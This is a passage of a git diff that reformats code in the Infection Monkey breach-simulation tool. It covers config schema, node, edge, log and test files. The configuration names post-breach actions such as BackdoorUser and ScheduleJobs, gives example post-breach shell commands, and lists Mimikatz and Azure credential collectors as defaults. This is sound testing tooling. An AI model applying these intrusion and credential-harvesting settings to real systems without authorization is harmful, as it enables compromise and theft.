(in seconds) for SMB download operation (used in various exploits using SMB)" + "description": "Timeout (in seconds) for SMB download operation (used in various exploits using SMB)", }, "smb_service_name": { "title": "SMB service name", "type": "string", "default": "InfectionMonkey", - "description": "Name of the SMB service that will be set up to download monkey" - } - } - } + "description": "Name of the SMB service that will be set up to download monkey", + }, + }, + }, }, "testing": { "title": "Testing", @@ -500,9 +451,9 @@ INTERNAL = { "type": "boolean", "default": False, "description": "Exports unencrypted telemetries that can be used for tests in development." - " Do not turn on!" + " Do not turn on!", } - } - } - } + }, + }, + }, } diff --git a/monkey/monkey_island/cc/services/config_schema/monkey.py b/monkey/monkey_island/cc/services/config_schema/monkey.py index 82a394b65..0d69c5aa4 100644 --- a/monkey/monkey_island/cc/services/config_schema/monkey.py +++ b/monkey/monkey_island/cc/services/config_schema/monkey.py @@ -1,6 +1,11 @@ -from common.common_consts.system_info_collectors_names import (AWS_COLLECTOR, AZURE_CRED_COLLECTOR, - ENVIRONMENT_COLLECTOR, HOSTNAME_COLLECTOR, - MIMIKATZ_COLLECTOR, PROCESS_LIST_COLLECTOR) +from common.common_consts.system_info_collectors_names import ( + AWS_COLLECTOR, + AZURE_CRED_COLLECTOR, + ENVIRONMENT_COLLECTOR, + HOSTNAME_COLLECTOR, + MIMIKATZ_COLLECTOR, + PROCESS_LIST_COLLECTOR, +) MONKEY = { "title": "Monkey", @@ -15,54 +20,52 @@ MONKEY = { "type": "string", "default": "", "description": "Command to be executed after breaching. " - "Use this field to run custom commands or execute uploaded " - "files on exploited machines.\nExample: " - "\"chmod +x ./my_script.sh; ./my_script.sh ; rm ./my_script.sh\"" + "Use this field to run custom commands or execute uploaded " + "files on exploited machines.\nExample: " + '"chmod +x ./my_script.sh; ./my_script.sh ; rm ./my_script.sh"', }, "PBA_linux_file": { "title": "Linux post-breach file", "type": "string", "format": "data-url", "description": "File to be uploaded after breaching. " - "Use the 'Linux post-breach command' field to " - "change permissions, run, or delete the file. " - "Reference your file by filename." + "Use the 'Linux post-breach command' field to " + "change permissions, run, or delete the file. " + "Reference your file by filename.", }, "custom_PBA_windows_cmd": { "title": "Windows post-breach command", "type": "string", "default": "", "description": "Command to be executed after breaching. " - "Use this field to run custom commands or execute uploaded " - "files on exploited machines.\nExample: " - "\"my_script.bat & del my_script.bat\"" + "Use this field to run custom commands or execute uploaded " + "files on exploited machines.\nExample: " + '"my_script.bat & del my_script.bat"', }, "PBA_windows_file": { "title": "Windows post-breach file", "type": "string", "format": "data-url", "description": "File to be uploaded after breaching. " - "Use the 'Windows post-breach command' field to " - "change permissions, run, or delete the file. " - "Reference your file by filename." + "Use the 'Windows post-breach command' field to " + "change permissions, run, or delete the file. " + "Reference your file by filename.", }, "PBA_windows_filename": { "title": "Windows PBA filename", "type": "string", - "default": "" + "default": "", }, "PBA_linux_filename": { "title": "Linux PBA filename", "type": "string", - "default": "" + "default": "", }, "post_breach_actions": { "title": "Post breach actions", "type": "array", "uniqueItems": True, - "items": { - "$ref": "#/definitions/post_breach_actions" - }, + "items": {"$ref": "#/definitions/post_breach_actions"}, "default": [ "BackdoorUser", "CommunicateAsNewUser", @@ -72,10 +75,10 @@ MONKEY = { "ChangeSetuidSetgid", "ScheduleJobs", "Timestomping", - "AccountDiscovery" - ] + "AccountDiscovery", + ], }, - } + }, }, "system_info": { "title": "System info", @@ -85,19 +88,17 @@ MONKEY = { "title": "System info collectors", "type": "array", "uniqueItems": True, - "items": { - "$ref": "#/definitions/system_info_collector_classes" - }, + "items": {"$ref": "#/definitions/system_info_collector_classes"}, "default": [ ENVIRONMENT_COLLECTOR, AWS_COLLECTOR, HOSTNAME_COLLECTOR, PROCESS_LIST_COLLECTOR, MIMIKATZ_COLLECTOR, - AZURE_CRED_COLLECTOR - ] + AZURE_CRED_COLLECTOR, + ], }, - } + }, }, "persistent_scanning": { "title": "Persistent scanning", @@ -109,25 +110,23 @@ MONKEY = { "default": 1, "minimum": 1, "description": "Determines how many iterations of the monkey's full lifecycle should occur " - "(how many times to do the scan)" + "(how many times to do the scan)", }, "timeout_between_iterations": { "title": "Wait time between iterations", "type": "integer", "default": 100, "minimum": 0, - "description": - "Determines for how long (in seconds) should the monkey wait before starting another scan" + "description": "Determines for how long (in seconds) should the monkey wait before starting another scan", }, "retry_failed_explotation": { "title": "Retry failed exploitation", "type": "boolean", "default": True, - "description": - "Determines whether the monkey should retry exploiting machines" - " it didn't successfully exploit on previous scans" - } - } - } - } + "description": "Determines whether the monkey should retry exploiting machines" + " it didn't successfully exploit on previous scans", + }, + }, + }, + }, } diff --git a/monkey/monkey_island/cc/services/database.py b/monkey/monkey_island/cc/services/database.py index 6144b6ef3..2efd3643a 100644 --- a/monkey/monkey_island/cc/services/database.py +++ b/monkey/monkey_island/cc/services/database.py @@ -17,15 +17,18 @@ class Database(object): @staticmethod def reset_db(): - logger.info('Resetting database') + logger.info("Resetting database") remove_PBA_files() # We can't drop system collections. - [Database.drop_collection(x) for x in mongo.db.collection_names() if not x.startswith('system.') - and not x == AttackMitigations.COLLECTION_NAME] + [ + Database.drop_collection(x) + for x in mongo.db.collection_names() + if not x.startswith("system.") and not x == AttackMitigations.COLLECTION_NAME + ] ConfigService.init_config() AttackConfig.reset_config() - logger.info('DB was reset') - return jsonify(status='OK') + logger.info("DB was reset") + return jsonify(status="OK") @staticmethod def drop_collection(collection_name: str): diff --git a/monkey/monkey_island/cc/services/edge/displayed_edge.py b/monkey/monkey_island/cc/services/edge/displayed_edge.py index f7a0664bf..67d42a3ab 100644 --- a/monkey/monkey_island/cc/services/edge/displayed_edge.py +++ b/monkey/monkey_island/cc/services/edge/displayed_edge.py @@ -9,7 +9,6 @@ __author__ = "itay.mizeretz" class DisplayedEdgeService: - @staticmethod def get_displayed_edges_by_dst(dst_id: str, for_report=False): edges = EdgeService.get_by_dst_node(dst_node_id=ObjectId(dst_id)) @@ -27,8 +26,9 @@ class DisplayedEdgeService: os = {} if len(edge.scans) > 0: - services = DisplayedEdgeService.services_to_displayed_services(edge.scans[-1]["data"]["services"], - for_report) + services = DisplayedEdgeService.services_to_displayed_services( + edge.scans[-1]["data"]["services"], for_report + ) os = edge.scans[-1]["data"]["os"] displayed_edge = DisplayedEdgeService.edge_to_net_edge(edge) @@ -44,15 +44,14 @@ class DisplayedEdgeService: @staticmethod def generate_pseudo_edge(edge_id, src_node_id, dst_node_id, src_label, dst_label): - edge = \ - { - "id": edge_id, - "from": src_node_id, - "to": dst_node_id, - "group": "island", - "src_label": src_label, - "dst_label": dst_label - } + edge = { + "id": edge_id, + "from": src_node_id, + "to": dst_node_id, + "group": "island", + "src_label": src_label, + "dst_label": dst_label, + } edge["_label"] = DisplayedEdgeService.get_pseudo_label(edge) return edge @@ -65,19 +64,21 @@ class DisplayedEdgeService: if for_report: return [x for x in services] else: - return [x + ": " + (services[x]['name'] if 'name' in services[x] else 'unknown') for x in services] + return [ + x + ": " + (services[x]["name"] if "name" in services[x] else "unknown") + for x in services + ] @staticmethod def edge_to_net_edge(edge: EdgeService): - return \ - { - "id": edge.id, - "from": edge.src_node_id, - "to": edge.dst_node_id, - "group": edge.get_group(), - "src_label": edge.src_label, - "dst_label": edge.dst_label - } + return { + "id": edge.id, + "from": edge.src_node_id, + "to": edge.dst_node_id, + "group": edge.get_group(), + "src_label": edge.src_label, + "dst_label": edge.dst_label, + } RIGHT_ARROW = "\u2192" diff --git a/monkey/monkey_island/cc/services/edge/edge.py b/monkey/monkey_island/cc/services/edge/edge.py index 4c9ef57d7..461b0e8a5 100644 --- a/monkey/monkey_island/cc/services/edge/edge.py +++ b/monkey/monkey_island/cc/services/edge/edge.py @@ -12,7 +12,6 @@ RIGHT_ARROW = "\u2192" class EdgeService(Edge): - @staticmethod def get_all_edges() -> List[EdgeService]: return EdgeService.objects() @@ -44,7 +43,9 @@ class EdgeService(Edge): elif self.dst_node_id == node_id: self.dst_label = label else: - raise DoesNotExist("Node id provided does not match with any endpoint of an self provided.") + raise DoesNotExist( + "Node id provided does not match with any endpoint of an self provided." + ) self.save() @staticmethod @@ -65,12 +66,8 @@ class EdgeService(Edge): self.save() def update_based_on_scan_telemetry(self, telemetry: Dict): - machine_info = copy.deepcopy(telemetry['data']['machine']) - new_scan = \ - { - "timestamp": telemetry["timestamp"], - "data": machine_info - } + machine_info = copy.deepcopy(telemetry["data"]["machine"]) + new_scan = {"timestamp": telemetry["timestamp"], "data": machine_info} ip_address = machine_info.pop("ip_addr") domain_name = machine_info.pop("domain_name") self.scans.append(new_scan) @@ -81,7 +78,7 @@ class EdgeService(Edge): def update_based_on_exploit(self, exploit: Dict): self.exploits.append(exploit) self.save() - if exploit['result']: + if exploit["result"]: self.set_exploited() def set_exploited(self): diff --git a/monkey/monkey_island/cc/services/edge/test_displayed_edge.py b/monkey/monkey_island/cc/services/edge/test_displayed_edge.py index 5aa97d923..2938909c2 100644 --- a/monkey/monkey_island/cc/services/edge/test_displayed_edge.py +++ b/monkey/monkey_island/cc/services/edge/test_displayed_edge.py @@ -3,45 +3,43 @@ from bson import ObjectId from monkey_island.cc.services.edge.displayed_edge import DisplayedEdgeService from monkey_island.cc.services.edge.edge import RIGHT_ARROW, EdgeService -SCAN_DATA_MOCK = [{ - "timestamp": "2020-05-27T14:59:28.944Z", - "data": { - "os": { - "type": "linux", - "version": "Ubuntu-4ubuntu2.8" - }, - "services": { - "tcp-8088": { - "display_name": "unknown(TCP)", - "port": 8088 +SCAN_DATA_MOCK = [ + { + "timestamp": "2020-05-27T14:59:28.944Z", + "data": { + "os": {"type": "linux", "version": "Ubuntu-4ubuntu2.8"}, + "services": { + "tcp-8088": {"display_name": "unknown(TCP)", "port": 8088}, + "tcp-22": { + "display_name": "SSH", + "port": 22, + "banner": "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8\r\n", + "name": "ssh", + }, }, - "tcp-22": { - "display_name": "SSH", - "port": 22, - "banner": "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8\r\n", - "name": "ssh" - } + "monkey_exe": None, + "default_tunnel": None, + "default_server": None, }, - "monkey_exe": None, - "default_tunnel": None, - "default_server": None } -}] +] -EXPLOIT_DATA_MOCK = [{ - "result": True, - "exploiter": "ElasticGroovyExploiter", - "info": { - "display_name": "Elastic search", - "started": "2020-05-11T08:59:38.105Z", - "finished": "2020-05-11T08:59:38.106Z", - "vulnerable_urls": [], - "vulnerable_ports": [], - "executed_cmds": [] - }, - "attempts": [], - "timestamp": "2020-05-27T14:59:29.048Z" -}] +EXPLOIT_DATA_MOCK = [ + { + "result": True, + "exploiter": "ElasticGroovyExploiter", + "info": { + "display_name": "Elastic search", + "started": "2020-05-11T08:59:38.105Z", + "finished": "2020-05-11T08:59:38.106Z", + "vulnerable_urls": [], + "vulnerable_ports": [], + "executed_cmds": [], + }, + "attempts": [], + "timestamp": "2020-05-27T14:59:29.048Z", + } +] class TestDisplayedEdgeService: @@ -61,33 +59,37 @@ class TestDisplayedEdgeService: def test_edge_to_displayed_edge(self): src_node_id = ObjectId() dst_node_id = ObjectId() - edge = EdgeService(src_node_id=src_node_id, - dst_node_id=dst_node_id, - scans=SCAN_DATA_MOCK, - exploits=EXPLOIT_DATA_MOCK, - exploited=True, - domain_name=None, - ip_address="10.2.2.2", - dst_label="Ubuntu-4ubuntu2.8", - src_label="Ubuntu-4ubuntu3.2") + edge = EdgeService( + src_node_id=src_node_id, + dst_node_id=dst_node_id, + scans=SCAN_DATA_MOCK, + exploits=EXPLOIT_DATA_MOCK, + exploited=True, + domain_name=None, + ip_address="10.2.2.2", + dst_label="Ubuntu-4ubuntu2.8", + src_label="Ubuntu-4ubuntu3.2", + ) displayed_edge = DisplayedEdgeService.edge_to_displayed_edge(edge) - assert displayed_edge['to'] == dst_node_id - assert displayed_edge['from'] == src_node_id - assert displayed_edge['ip_address'] == "10.2.2.2" - assert displayed_edge['services'] == ["tcp-8088: unknown", "tcp-22: ssh"] - assert displayed_edge['os'] == {"type": "linux", "version": "Ubuntu-4ubuntu2.8"} - assert displayed_edge['exploits'] == EXPLOIT_DATA_MOCK - assert displayed_edge['_label'] == "Ubuntu-4ubuntu3.2 " + RIGHT_ARROW + " Ubuntu-4ubuntu2.8" - assert displayed_edge['group'] == "exploited" + assert displayed_edge["to"] == dst_node_id + assert displayed_edge["from"] == src_node_id + assert displayed_edge["ip_address"] == "10.2.2.2" + assert displayed_edge["services"] == ["tcp-8088: unknown", "tcp-22: ssh"] + assert displayed_edge["os"] == {"type": "linux", "version": "Ubuntu-4ubuntu2.8"} + assert displayed_edge["exploits"] == EXPLOIT_DATA_MOCK + assert displayed_edge["_label"] == "Ubuntu-4ubuntu3.2 " + RIGHT_ARROW + " Ubuntu-4ubuntu2.8" + assert displayed_edge["group"] == "exploited" return displayed_edge def test_services_to_displayed_services(self): - services1 = DisplayedEdgeService.services_to_displayed_services(SCAN_DATA_MOCK[-1]["data"]["services"], - True) + services1 = DisplayedEdgeService.services_to_displayed_services( + SCAN_DATA_MOCK[-1]["data"]["services"], True + ) assert services1 == ["tcp-8088", "tcp-22"] - services2 = DisplayedEdgeService.services_to_displayed_services(SCAN_DATA_MOCK[-1]["data"]["services"], - False) + services2 = DisplayedEdgeService.services_to_displayed_services( + SCAN_DATA_MOCK[-1]["data"]["services"], False + ) assert services2 == ["tcp-8088: unknown", "tcp-22: ssh"] diff --git a/monkey/monkey_island/cc/services/edge/test_edge.py b/monkey/monkey_island/cc/services/edge/test_edge.py index f327bc2d1..99ecf52d7 100644 --- a/monkey/monkey_island/cc/services/edge/test_edge.py +++ b/monkey/monkey_island/cc/services/edge/test_edge.py @@ -11,7 +11,6 @@ logger = logging.getLogger(__name__) class TestEdgeService: - @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_get_or_create_edge(self): src_id = ObjectId() @@ -34,9 +33,7 @@ class TestEdgeService: assert len(Edge.objects()) == 1 def test_get_edge_group(self): - edge = Edge(src_node_id=ObjectId(), - dst_node_id=ObjectId(), - exploited=True) + edge = Edge(src_node_id=ObjectId(), dst_node_id=ObjectId(), exploited=True) assert "exploited" == EdgeService.get_group(edge) edge.exploited = False diff --git a/monkey/monkey_island/cc/services/groups_and_users_consts.py b/monkey/monkey_island/cc/services/groups_and_users_consts.py index 0e22a34ba..4121688d1 100644 --- a/monkey/monkey_island/cc/services/groups_and_users_consts.py +++ b/monkey/monkey_island/cc/services/groups_and_users_consts.py @@ -1,6 +1,6 @@ """This file will include consts values regarding the groupsandusers collection""" -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" USERTYPE = 1 GROUPTYPE = 2 diff --git a/monkey/monkey_island/cc/services/infection_lifecycle.py b/monkey/monkey_island/cc/services/infection_lifecycle.py index 44d303fc3..1f4c0e87e 100644 --- a/monkey/monkey_island/cc/services/infection_lifecycle.py +++ b/monkey/monkey_island/cc/services/infection_lifecycle.py @@ -8,21 +8,25 @@ from monkey_island.cc.resources.test.utils.telem_store import TestTelemStore from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.reporting.report import ReportService -from monkey_island.cc.services.reporting.report_generation_synchronisation import (is_report_being_generated, - safe_generate_reports) +from monkey_island.cc.services.reporting.report_generation_synchronisation import ( + is_report_being_generated, + safe_generate_reports, +) logger = logging.getLogger(__name__) class InfectionLifecycle: - @staticmethod def kill_all(): - mongo.db.monkey.update({'dead': False}, {'$set': {'config.alive': False, 'modifytime': datetime.now()}}, - upsert=False, - multi=True) - logger.info('Kill all monkeys was called') - return jsonify(status='OK') + mongo.db.monkey.update( + {"dead": False}, + {"$set": {"config.alive": False, "modifytime": datetime.now()}}, + upsert=False, + multi=True, + ) + logger.info("Kill all monkeys was called") + return jsonify(status="OK") @staticmethod def get_completed_steps(): @@ -39,7 +43,8 @@ class InfectionLifecycle: run_server=True, run_monkey=is_any_exists, infection_done=infection_done, - report_done=report_done) + report_done=report_done, + ) @staticmethod def _on_finished_infection(): diff --git a/monkey/monkey_island/cc/services/island_logs.py b/monkey/monkey_island/cc/services/island_logs.py index be6aae12d..846b2e844 100644 --- a/monkey/monkey_island/cc/services/island_logs.py +++ b/monkey/monkey_island/cc/services/island_logs.py @@ -20,14 +20,12 @@ class IslandLogService: """ logger_handlers = logger.parent.handlers for handler in logger_handlers: - if hasattr(handler, 'baseFilename'): - logger.info('Log file found: {0}'.format(handler.baseFilename)) + if hasattr(handler, "baseFilename"): + logger.info("Log file found: {0}".format(handler.baseFilename)) log_file_path = handler.baseFilename - with open(log_file_path, 'rt') as f: + with open(log_file_path, "rt") as f: log_file = f.read() - return { - 'log_file': log_file - } + return {"log_file": log_file} - logger.warning('No log file could be found, check logger config.') + logger.warning("No log file could be found, check logger config.") return None diff --git a/monkey/monkey_island/cc/services/log.py b/monkey/monkey_island/cc/services/log.py index a10e51f86..f4f3374d6 100644 --- a/monkey/monkey_island/cc/services/log.py +++ b/monkey/monkey_island/cc/services/log.py @@ -12,37 +12,33 @@ class LogService: @staticmethod def get_log_by_monkey_id(monkey_id): - log = mongo.db.log.find_one({'monkey_id': monkey_id}) + log = mongo.db.log.find_one({"monkey_id": monkey_id}) if log: - log_file = database.gridfs.get(log['file_id']) + log_file = database.gridfs.get(log["file_id"]) monkey_label = monkey_island.cc.services.node.NodeService.get_monkey_label( - monkey_island.cc.services.node.NodeService.get_monkey_by_id(log['monkey_id'])) - return \ - { - 'monkey_label': monkey_label, - 'log': log_file.read().decode(), - 'timestamp': log['timestamp'] - } + monkey_island.cc.services.node.NodeService.get_monkey_by_id(log["monkey_id"]) + ) + return { + "monkey_label": monkey_label, + "log": log_file.read().decode(), + "timestamp": log["timestamp"], + } @staticmethod def remove_logs_by_monkey_id(monkey_id): - log = mongo.db.log.find_one({'monkey_id': monkey_id}) + log = mongo.db.log.find_one({"monkey_id": monkey_id}) if log is not None: - database.gridfs.delete(log['file_id']) - mongo.db.log.delete_one({'monkey_id': monkey_id}) + database.gridfs.delete(log["file_id"]) + mongo.db.log.delete_one({"monkey_id": monkey_id}) @staticmethod def add_log(monkey_id, log_data, timestamp=datetime.now()): LogService.remove_logs_by_monkey_id(monkey_id) - file_id = database.gridfs.put(log_data, encoding='utf-8') + file_id = database.gridfs.put(log_data, encoding="utf-8") return mongo.db.log.insert( - { - 'monkey_id': monkey_id, - 'file_id': file_id, - 'timestamp': timestamp - } + {"monkey_id": monkey_id, "file_id": file_id, "timestamp": timestamp} ) @staticmethod def log_exists(monkey_id): - return mongo.db.log.find_one({'monkey_id': monkey_id}) is not None + return mongo.db.log.find_one({"monkey_id": monkey_id}) is not None diff --git a/monkey/monkey_island/cc/services/netmap/net_edge.py b/monkey/monkey_island/cc/services/netmap/net_edge.py index 0734bf606..008fa5b54 100644 --- a/monkey/monkey_island/cc/services/netmap/net_edge.py +++ b/monkey/monkey_island/cc/services/netmap/net_edge.py @@ -7,7 +7,6 @@ from monkey_island.cc.services.node import NodeService class NetEdgeService: - @staticmethod def get_all_net_edges(): edges = NetEdgeService._get_standard_net_edges() @@ -34,22 +33,29 @@ class NetEdgeService: island_id = ObjectId("000000000000000000000000") monkey_label = NodeService.get_label_for_endpoint(monkey_id) island_label = NodeService.get_label_for_endpoint(island_id) - island_pseudo_edge = DisplayedEdgeService.generate_pseudo_edge(edge_id=fake_id, - src_node_id=monkey_id, - dst_node_id=island_id, - src_label=monkey_label, - dst_label=island_label) + island_pseudo_edge = DisplayedEdgeService.generate_pseudo_edge( + edge_id=fake_id, + src_node_id=monkey_id, + dst_node_id=island_id, + src_label=monkey_label, + dst_label=island_label, + ) edges.append(island_pseudo_edge) return edges @staticmethod def _get_infected_island_net_edges(monkey_island_monkey): - existing_ids = [x.src_node_id for x - in EdgeService.get_by_dst_node(dst_node_id=monkey_island_monkey["_id"])] - monkey_ids = [x.id for x in Monkey.objects() - if ("tunnel" not in x) and - (x.id not in existing_ids) and - (x.id != monkey_island_monkey["_id"])] + existing_ids = [ + x.src_node_id + for x in EdgeService.get_by_dst_node(dst_node_id=monkey_island_monkey["_id"]) + ] + monkey_ids = [ + x.id + for x in Monkey.objects() + if ("tunnel" not in x) + and (x.id not in existing_ids) + and (x.id != monkey_island_monkey["_id"]) + ] edges = [] count = 0 @@ -59,11 +65,13 @@ class NetEdgeService: fake_id = ObjectId(hex(count)[2:].zfill(24)) src_label = NodeService.get_label_for_endpoint(monkey_id) dst_label = NodeService.get_label_for_endpoint(monkey_island_monkey["_id"]) - edge = DisplayedEdgeService.generate_pseudo_edge(edge_id=fake_id, - src_node_id=monkey_id, - dst_node_id=monkey_island_monkey["_id"], - src_label=src_label, - dst_label=dst_label) + edge = DisplayedEdgeService.generate_pseudo_edge( + edge_id=fake_id, + src_node_id=monkey_id, + dst_node_id=monkey_island_monkey["_id"], + src_label=src_label, + dst_label=dst_label, + ) edges.append(edge) return edges diff --git a/monkey/monkey_island/cc/services/netmap/net_node.py b/monkey/monkey_island/cc/services/netmap/net_node.py index 796167cf5..6bb54fd40 100644 --- a/monkey/monkey_island/cc/services/netmap/net_node.py +++ b/monkey/monkey_island/cc/services/netmap/net_node.py @@ -3,7 +3,6 @@ from monkey_island.cc.services.node import NodeService class NetNodeService: - @staticmethod def get_all_net_nodes(): monkeys = NetNodeService._get_monkey_net_nodes() diff --git a/monkey/monkey_island/cc/services/node.py b/monkey/monkey_island/cc/services/node.py index 1c2c0f9f1..5bfb60776 100644 --- a/monkey/monkey_island/cc/services/node.py +++ b/monkey/monkey_island/cc/services/node.py @@ -36,7 +36,7 @@ class NodeService: # node is infected new_node = NodeService.monkey_to_net_node(monkey, for_report) for key in monkey: - if key not in ['_id', 'modifytime', 'parent', 'dead', 'description']: + if key not in ["_id", "modifytime", "parent", "dead", "description"]: new_node[key] = monkey[key] else: @@ -52,18 +52,18 @@ class NodeService: edges = DisplayedEdgeService.get_displayed_edges_by_dst(node_id, for_report) for edge in edges: - from_node_id = edge['from'] + from_node_id = edge["from"] from_node_label = Monkey.get_label_by_id(from_node_id) from_node_hostname = Monkey.get_hostname_by_id(from_node_id) accessible_from_nodes.append(from_node_label) accessible_from_nodes_hostnames.append(from_node_hostname) - for edge_exploit in edge['exploits']: - edge_exploit['origin'] = from_node_label + for edge_exploit in edge["exploits"]: + edge_exploit["origin"] = from_node_label exploits.append(edge_exploit) - exploits = sorted(exploits, key=lambda exploit: exploit['timestamp']) + exploits = sorted(exploits, key=lambda exploit: exploit["timestamp"]) new_node["exploits"] = exploits new_node["accessible_from_nodes"] = accessible_from_nodes @@ -73,7 +73,7 @@ class NodeService: else: new_node["services"] = [] - new_node['has_log'] = monkey_island.cc.services.log.LogService.log_exists(ObjectId(node_id)) + new_node["has_log"] = monkey_island.cc.services.log.LogService.log_exists(ObjectId(node_id)) return new_node @staticmethod @@ -110,8 +110,9 @@ class NodeService: @staticmethod def get_monkey_critical_services(monkey_id): - critical_services = mongo.db.monkey.find_one({'_id': monkey_id}, {'critical_services': 1}).get( - 'critical_services', []) + critical_services = mongo.db.monkey.find_one( + {"_id": monkey_id}, {"critical_services": 1} + ).get("critical_services", []) return critical_services @staticmethod @@ -139,8 +140,8 @@ class NodeService: @staticmethod def get_node_group(node) -> str: - if 'group' in node and node['group']: - return node['group'] + if "group" in node and node["group"]: + return node["group"] node_type = "exploited" if node.get("exploited") else "clean" node_os = NodeService.get_node_os(node) return NodeStates.get_by_keywords([node_type, node_os]).value @@ -148,44 +149,41 @@ class NodeService: @staticmethod def monkey_to_net_node(monkey, for_report=False): monkey_id = monkey["_id"] - label = Monkey.get_hostname_by_id(monkey_id) if for_report else Monkey.get_label_by_id(monkey_id) + label = ( + Monkey.get_hostname_by_id(monkey_id) + if for_report + else Monkey.get_label_by_id(monkey_id) + ) monkey_group = NodeService.get_monkey_group(monkey) - return \ - { - "id": monkey_id, - "label": label, - "group": monkey_group, - "os": NodeService.get_monkey_os(monkey), - # The monkey is running IFF the group contains "_running". Therefore it's dead IFF the group does NOT - # contain "_running". This is a small optimisation, to not call "is_dead" twice. - "dead": "_running" not in monkey_group, - "domain_name": "", - "pba_results": monkey["pba_results"] if "pba_results" in monkey else [] - } + return { + "id": monkey_id, + "label": label, + "group": monkey_group, + "os": NodeService.get_monkey_os(monkey), + # The monkey is running IFF the group contains "_running". Therefore it's dead IFF the group does NOT + # contain "_running". This is a small optimisation, to not call "is_dead" twice. + "dead": "_running" not in monkey_group, + "domain_name": "", + "pba_results": monkey["pba_results"] if "pba_results" in monkey else [], + } @staticmethod def node_to_net_node(node, for_report=False): - label = node['os']['version'] if for_report else NodeService.get_node_label(node) - return \ - { - "id": node["_id"], - "label": label, - "group": NodeService.get_node_group(node), - "os": NodeService.get_node_os(node) - } + label = node["os"]["version"] if for_report else NodeService.get_node_label(node) + return { + "id": node["_id"], + "label": label, + "group": NodeService.get_node_group(node), + "os": NodeService.get_node_os(node), + } @staticmethod def set_node_group(node_id: str, node_group: NodeStates): - mongo.db.node.update({"_id": node_id}, - {'$set': {'group': node_group.value}}, - upsert=False) + mongo.db.node.update({"_id": node_id}, {"$set": {"group": node_group.value}}, upsert=False) @staticmethod def unset_all_monkey_tunnels(monkey_id): - mongo.db.monkey.update( - {"_id": monkey_id}, - {'$unset': {'tunnel': ''}}, - upsert=False) + mongo.db.monkey.update({"_id": monkey_id}, {"$unset": {"tunnel": ""}}, upsert=False) edges = EdgeService.get_tunnel_edges_by_src(monkey_id) for edge in edges: @@ -196,84 +194,88 @@ class NodeService: tunnel_host_id = NodeService.get_monkey_by_ip(tunnel_host_ip)["_id"] NodeService.unset_all_monkey_tunnels(monkey_id) mongo.db.monkey.update( - {'_id': monkey_id}, - {'$set': {'tunnel': tunnel_host_id}}, - upsert=False) + {"_id": monkey_id}, {"$set": {"tunnel": tunnel_host_id}}, upsert=False + ) monkey_label = NodeService.get_label_for_endpoint(monkey_id) tunnel_host_label = NodeService.get_label_for_endpoint(tunnel_host_id) - tunnel_edge = EdgeService.get_or_create_edge(src_node_id=monkey_id, - dst_node_id=tunnel_host_id, - src_label=monkey_label, - dst_label=tunnel_host_label) + tunnel_edge = EdgeService.get_or_create_edge( + src_node_id=monkey_id, + dst_node_id=tunnel_host_id, + src_label=monkey_label, + dst_label=tunnel_host_label, + ) tunnel_edge.tunnel = True tunnel_edge.ip_address = tunnel_host_ip tunnel_edge.save() @staticmethod - def insert_node(ip_address, domain_name=''): + def insert_node(ip_address, domain_name=""): new_node_insert_result = mongo.db.node.insert_one( { "ip_addresses": [ip_address], "domain_name": domain_name, "exploited": False, "creds": [], - "os": - { - "type": "unknown", - "version": "unknown" - } - }) + "os": {"type": "unknown", "version": "unknown"}, + } + ) return mongo.db.node.find_one({"_id": new_node_insert_result.inserted_id}) @staticmethod def create_node_from_bootloader_telem(bootloader_telem: Dict, will_monkey_run: bool): new_node_insert_result = mongo.db.node.insert_one( { - "ip_addresses": bootloader_telem['ips'], - "domain_name": bootloader_telem['hostname'], + "ip_addresses": bootloader_telem["ips"], + "domain_name": bootloader_telem["hostname"], "will_monkey_run": will_monkey_run, "exploited": False, "creds": [], - "os": - { - "type": bootloader_telem['system'], - "version": bootloader_telem['os_version'] - } - }) + "os": { + "type": bootloader_telem["system"], + "version": bootloader_telem["os_version"], + }, + } + ) return mongo.db.node.find_one({"_id": new_node_insert_result.inserted_id}) @staticmethod - def get_or_create_node_from_bootloader_telem(bootloader_telem: Dict, will_monkey_run: bool) -> Dict: - if is_local_ips(bootloader_telem['ips']): + def get_or_create_node_from_bootloader_telem( + bootloader_telem: Dict, will_monkey_run: bool + ) -> Dict: + if is_local_ips(bootloader_telem["ips"]): raise NodeCreationException("Bootloader ran on island, no need to create new node.") - new_node = mongo.db.node.find_one({"ip_addresses": {"$in": bootloader_telem['ips']}}) + new_node = mongo.db.node.find_one({"ip_addresses": {"$in": bootloader_telem["ips"]}}) # Temporary workaround to not create a node after monkey finishes - monkey_node = mongo.db.monkey.find_one({"ip_addresses": {"$in": bootloader_telem['ips']}}) + monkey_node = mongo.db.monkey.find_one({"ip_addresses": {"$in": bootloader_telem["ips"]}}) if monkey_node: # Don't create new node, monkey node is already present return monkey_node if new_node is None: - new_node = NodeService.create_node_from_bootloader_telem(bootloader_telem, will_monkey_run) - if bootloader_telem['tunnel']: - dst_node = NodeService.get_node_or_monkey_by_ip(bootloader_telem['tunnel']) + new_node = NodeService.create_node_from_bootloader_telem( + bootloader_telem, will_monkey_run + ) + if bootloader_telem["tunnel"]: + dst_node = NodeService.get_node_or_monkey_by_ip(bootloader_telem["tunnel"]) else: dst_node = NodeService.get_monkey_island_node() - src_label = NodeService.get_label_for_endpoint(new_node['_id']) - dst_label = NodeService.get_label_for_endpoint(dst_node['id']) - edge = EdgeService.get_or_create_edge(src_node_id=new_node['_id'], - dst_node_id=dst_node['id'], - src_label=src_label, - dst_label=dst_label) - edge.tunnel = bool(bootloader_telem['tunnel']) - edge.ip_address = bootloader_telem['ips'][0] - edge.group = NodeStates.get_by_keywords(['island']).value + src_label = NodeService.get_label_for_endpoint(new_node["_id"]) + dst_label = NodeService.get_label_for_endpoint(dst_node["id"]) + edge = EdgeService.get_or_create_edge( + src_node_id=new_node["_id"], + dst_node_id=dst_node["id"], + src_label=src_label, + dst_label=dst_label, + ) + edge.tunnel = bool(bootloader_telem["tunnel"]) + edge.ip_address = bootloader_telem["ips"][0] + edge.group = NodeStates.get_by_keywords(["island"]).value edge.save() return new_node @staticmethod - def get_or_create_node(ip_address, domain_name=''): + def get_or_create_node(ip_address, domain_name=""): new_node = mongo.db.node.find_one({"ip_addresses": ip_address}) if new_node is None: new_node = NodeService.insert_node(ip_address, domain_name) @@ -301,27 +303,25 @@ class NodeService: @staticmethod def update_monkey_modify_time(monkey_id): - mongo.db.monkey.update({"_id": 